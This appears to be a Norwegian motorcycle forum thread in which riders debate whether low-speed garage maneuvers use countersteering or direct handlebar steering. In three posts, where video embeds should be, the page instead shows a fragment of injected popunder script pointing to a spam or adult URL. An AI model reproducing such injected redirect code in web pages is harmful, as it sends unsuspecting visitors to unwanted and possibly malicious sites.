Krypkjøring "garasjeøvelsen"

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
KåreDump
Innlegg: 709
Registrert: 27 feb 2015, 15:24
Motorsykkelen din: Støypjernskomfyr med vesker

Re: Krypkjøring "garasjeøvelsen"

Legg inn av KåreDump »

127Tom skrev: 31 mai 2021, 00:50
Se den videoen her. Handlebar steering vs contra steering. Her både forklares det og vises:
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
For en løk!!
"I'am handlebar steering" sier han, og så viser videoen tydelig at ha kontrastyrer for å starte svingen!
Fysikkens lover verken starter eller stopper "about 15 mph", med mindre du kjører trehjulssykkel så er det ikke noe "handlebar steering". :lol

Eneste måte er å svinge et kjøretøy med to hjul på linje er ved å falle inn i svingen, og det gjør man med kontrastyring, at kontrastyringen deretter "maskeres" av at han svinger inn i svingen (for å motvirke fallet) med det han kaller handlebar steering endrer ikke det faktum at det er kontrastyring som "velter" sykkelen inn i sving.
Sist redigert av KåreDump den 01 jun 2021, 15:37, redigert 1 gang totalt.
I never apologize.
I'm sorry, but that's just the way I am.

Brukeravatar
KåreDump
Innlegg: 709
Registrert: 27 feb 2015, 15:24
Motorsykkelen din: Støypjernskomfyr med vesker

Re: Krypkjøring "garasjeøvelsen"

Legg inn av KåreDump »

kaLARSnikov skrev: 01 jun 2021, 15:05 Kan bare konkludere med at sykkeltype/vekt også må ha en del å si.
Nope, ikke det heller forandrer fysikken.
Det at styret vinkles inni svingen er for å motvirke fallet inni kurven, det er altså effekten ikke årsaken. :-/
I never apologize.
I'm sorry, but that's just the way I am.

Brukeravatar
FredrikE24
Innlegg: 4715
Registrert: 24 apr 2016, 18:53
Motorsykkelen din: BMW K1200RS
Sted: Nordre Follo

Re: Krypkjøring "garasjeøvelsen"

Legg inn av FredrikE24 »

Det er mitt poeng. Jeg bruker så lite krefter jeg kan for at styret skal legge over. På den måten kan jeg sitte riktig, med vinkel i albuene, slakt foroverlent og slakke armer. Det gir bedre kontroll.

I garasjen begynner man med en venstreturn. I utgangen skyver man på høyre holke for å svinge til høyre.

Man kan jo sitte rett opp og ned å krype med sykkelen helt i lodd, men da blir det mye fikling og det er ofte da man mister retningen når man kommer ut av balanse. Det var nok litt slik det ble lagt opp på kjøreskolen, men egentlig aldri noe jeg gjorde.

kaLARSnikov
Innlegg: 179
Registrert: 22 jul 2020, 13:31
Motorsykkelen din: '20 Tiger 900 Rally Pro
Sted: Østfold

Re: Krypkjøring "garasjeøvelsen"

Legg inn av kaLARSnikov »

FredrikE24 skrev: 01 jun 2021, 15:42 Man kan jo sitte rett opp og ned å krype med sykkelen helt i lodd, men da blir det mye fikling og det er ofte da man mister retningen når man kommer ut av balanse. Det var nok litt slik det ble lagt opp på kjøreskolen, men egentlig aldri noe jeg gjorde.
Jepp, det er nettopp slik kjøreskolen lærer det (i alle fall den jeg bruker). Syns egentlig det er svært lite fikling. Tvert i mot, det eneste jeg trenger å tenke på bortsett fra clutch/gass/kanskje litt bakbrems er å peke styret i den retningen jeg skal. På de syklene jeg har kjørt så krever det hverken kraft eller fikling, og jeg trenger ikke å tenke på nedlegg, motvekt, eller at svinger skal påbegynnes med en kort kontrastyringsmanøver.

Når det er sagt så får jo alle kjøre slik de selv ønsker så fremt de har god kontroll på seg selv og sykkelen med sin metodikk :) Jeg velger å følge kjørelærer frem til oppkjøring i alle fall, med den tankegangen at god veiledning og tilbakemeldinger fra kjørelærer forutsetter at jeg prøver å kjøre slik kjørelærer forsøker å lære bort.

xavi0n
Innlegg: 497
Registrert: 28 feb 2021, 12:45
Motorsykkelen din: 2012 yamaha fz8, 2015 Suzuki vstrom 1000

Re: Krypkjøring "garasjeøvelsen"

Legg inn av xavi0n »

Var akkurat det du sier jeg gjorde i starten å, men etter litt trening på å kontrastyre litt å la sykkelen falle inn i svingen litt, fungerer sikker ikke for alle på alle sykler, men for meg på en mt07 var det himmel og hav i forskjell
If you gonna be dumb you gotta be tough

Brukeravatar
127Tom
Innlegg: 198
Registrert: 01 apr 2021, 15:11
Motorsykkelen din: HD FXDX, Intruder 1400, HD FXDWG
Sted: Oslo

Re: Krypkjøring "garasjeøvelsen"

Legg inn av 127Tom »

Hvordan du velger å legge ned sykkelen er jo opp til deg selv da. Om du dytter på styret eller lener deg over eller vrikker på hofta.
Men i det styret ditt peker mot venstre og sykkelen går mot venstre / svinger til venstre så kontra styrer du ikke.
Kontra styring er når du dytter styret i venstre retning og sykkelen går mot høyre.
Ikke gjør dette mer komplisert enn nødvendig og forvirr nybegynnere. I følge deg så kontra styrer man jo hele tiden da?

Brukeravatar
127Tom
Innlegg: 198
Registrert: 01 apr 2021, 15:11
Motorsykkelen din: HD FXDX, Intruder 1400, HD FXDWG
Sted: Oslo

Re: Krypkjøring "garasjeøvelsen"

Legg inn av 127Tom »

xavi0n skrev: 01 jun 2021, 10:07 Du er veldig bastant på at det som ikke fungerer for deg umulig kan fungere for noen andre....
Snakker om ren fysikk. Hvis sykkelen din svinger til venstre og styret ditt peker mot venstre, så kontra styrer du ikke.
Det er ren fysikk.
Men hvordan du først velger å legge ned sykkelen er en annen ting: da kan du pushe på styret, vrikke på hofta eller lene deg over.
Hver sin smak.

xavi0n
Innlegg: 497
Registrert: 28 feb 2021, 12:45
Motorsykkelen din: 2012 yamaha fz8, 2015 Suzuki vstrom 1000

Re: Krypkjøring "garasjeøvelsen"

Legg inn av xavi0n »

Har vel aldri vært snakk om å kontrastyre gjennom hele svingen, det sier seg selv.
Misforstår du med vilje for å prøve å ha rett eller er du bare glad i å være uenig?
If you gonna be dumb you gotta be tough

Brukeravatar
Canutus
Innlegg: 466
Registrert: 10 mai 2016, 11:24
Motorsykkelen din: BMW K1300R
Sted: Vinje - Sentralt i MC eldorado
Kontakt:

Re: Krypkjøring "garasjeøvelsen"

Legg inn av Canutus »

Du kan da helt fint kontrastyre når som helst i en sving. Om man er i en venstresving og hjulet er svingt 2grader til venstre, om du så presser venstre holke (kontrastyrer) slik at hjulet rettes opp til 1grad sving, så resulterer det i nedbrekk, som igjen fører til krappere sving (pga. hjul/gaffelgeometri).
Kontrastyring betyr IKKE at hjulet skal peke motsatt av der du skal svinge, men for å begynne ett nedlegg til venstre så svinges hjulet til høyre et lite øyeblikk før en må styre etter i svingen for å gjenopprette balansen. Ren fysikk som du sier;-)
Dette kan du lettere studere på trøsykkel der en ser hjulets bevegelser tydeligere.

127Tom skrev: 01 jun 2021, 17:51
xavi0n skrev: 01 jun 2021, 10:07 Du er veldig bastant på at det som ikke fungerer for deg umulig kan fungere for noen andre....
Snakker om ren fysikk. Hvis sykkelen din svinger til venstre og styret ditt peker mot venstre, så kontra styrer du ikke.
Det er ren fysikk.
Men hvordan du først velger å legge ned sykkelen er en annen ting: da kan du pushe på styret, vrikke på hofta eller lene deg over.
Hver sin smak.

Leoparden
Innlegg: 47
Registrert: 21 jul 2020, 00:11
Motorsykkelen din: Triumph Tiger 900 GT Pro (21)

Re: Krypkjøring "garasjeøvelsen"

Legg inn av Leoparden »

Jeg har tydeligvis lagt noe annet i kontrastyring enn det jeg leser her inne. PÅ landevei i fart i en venstresving kan jeg slippe høyre hånd (med CC), og kun dytte med venstre, og da komme fint gjennom svingen. Da trodde mener jeg at jeg kontrastyrer. Det samme gjør jeg på unna manøver i fart, da dytter jeg venstre holke for å starte sving etc.
I garasjen derimot, siden man må stoppe, starter jeg med mer eller mindre fullt utslag på rattet til venstre, også justerer jeg med egen vekt fart ikke minst blikk. Det har jeg aldri falt meg inn kunne betegnes som kontrastyring. Ei heller mellom de 4 kjeglene (slalåm) i gangfart, mener jeg at jeg kontrastyrer på samme vis om på landevei og unna manøver.

Det kan tenkes det er en slags automatikk jeg ikke tenker over, men ettersom jeg leser her inne heller jeg mot at jeg rett og slett ikke trodde at begrepet kontrastyring innebar "all" styring man gjør på to hjul alltid.
Hvis så, er det jo greit da. Men da trenger man vel ikke flere begreper.

Brukeravatar
kgjersda
Innlegg: 645
Registrert: 24 apr 2017, 11:58
Motorsykkelen din: S1000RR -22, CBR1000RR -05

Re: Krypkjøring "garasjeøvelsen"

Legg inn av kgjersda »

Sykkelen vil kontrastyre av seg selv om du bare prøver å flytte på overkroppen for å styre sykkelen. Det er bare sånn det fungerer.
Prøver å finne video av demonstrasjon...
Det evige beitet: Rieju RMX 50 // Yamaha DT125RE // Yamaha Fazer FZS600 // Yamaha MT-10 SP -17
I stallen: BMW S1000RR -22 // Honda CBR1000RR -05 (Banesykkel)

Brukeravatar
127Tom
Innlegg: 198
Registrert: 01 apr 2021, 15:11
Motorsykkelen din: HD FXDX, Intruder 1400, HD FXDWG
Sted: Oslo

Re: Krypkjøring "garasjeøvelsen"

Legg inn av 127Tom »

kgjersda skrev: 02 jun 2021, 15:20 Sykkelen vil kontrastyre av seg selv om du bare prøver å flytte på overkroppen for å styre sykkelen. Det er bare sånn det fungerer.
Prøver å finne video av demonstrasjon...
Posta jo video av demonstrasjon! Her har du den igjen. Hadde heller stolt mer på en Politi MC fører lærer enn visse eksperter på forumet her ;)

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Brukeravatar
127Tom
Innlegg: 198
Registrert: 01 apr 2021, 15:11
Motorsykkelen din: HD FXDX, Intruder 1400, HD FXDWG
Sted: Oslo

Re: Krypkjøring "garasjeøvelsen"

Legg inn av 127Tom »

Leoparden skrev: 02 jun 2021, 15:02 Jeg har tydeligvis lagt noe annet i kontrastyring enn det jeg leser her inne. PÅ landevei i fart i en venstresving kan jeg slippe høyre hånd (med CC), og kun dytte med venstre, og da komme fint gjennom svingen. Da trodde mener jeg at jeg kontrastyrer. Det samme gjør jeg på unna manøver i fart, da dytter jeg venstre holke for å starte sving etc.
I garasjen derimot, siden man må stoppe, starter jeg med mer eller mindre fullt utslag på rattet til venstre, også justerer jeg med egen vekt fart ikke minst blikk. Det har jeg aldri falt meg inn kunne betegnes som kontrastyring. Ei heller mellom de 4 kjeglene (slalåm) i gangfart, mener jeg at jeg kontrastyrer på samme vis om på landevei og unna manøver.
Du har helt rett og gjør det helt rett. Ikke la deg forvirre av visse folk

Brukeravatar
127Tom
Innlegg: 198
Registrert: 01 apr 2021, 15:11
Motorsykkelen din: HD FXDX, Intruder 1400, HD FXDWG
Sted: Oslo

Re: Krypkjøring "garasjeøvelsen"

Legg inn av 127Tom »

Canutus skrev: 02 jun 2021, 09:34 Kontrastyring betyr IKKE at hjulet skal peke motsatt av der du skal svinge, men for å begynne ett nedlegg til venstre så svinges hjulet til høyre et
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

:knegg

Brukeravatar
pekle
Innlegg: 650
Registrert: 19 aug 2018, 19:18
Motorsykkelen din: No FUD

Re: Krypkjøring "garasjeøvelsen"

Legg inn av pekle »

Det er ca 50 sider med diskusjon her om noen går tom for argumenter i den ene eller andre retningen: https://www.mcsiden.no/viewtopic.php?p=102334#p102334

Dette er en grei visualisering/oppsummering av det Canutus skriver: https://www.youtube.com/watch?v=C848R9xWrjc

Problemet til McCop er at han muligens definerer kontrastyring som at hjulet peker motsatt av svingretning, mens det egentlig er motsatt av (ønsket) retningsforandring. Når man definerer ting ulikt er det ikke så lett å enes.
Sist redigert av pekle den 02 jun 2021, 23:05, redigert 1 gang totalt.

Svar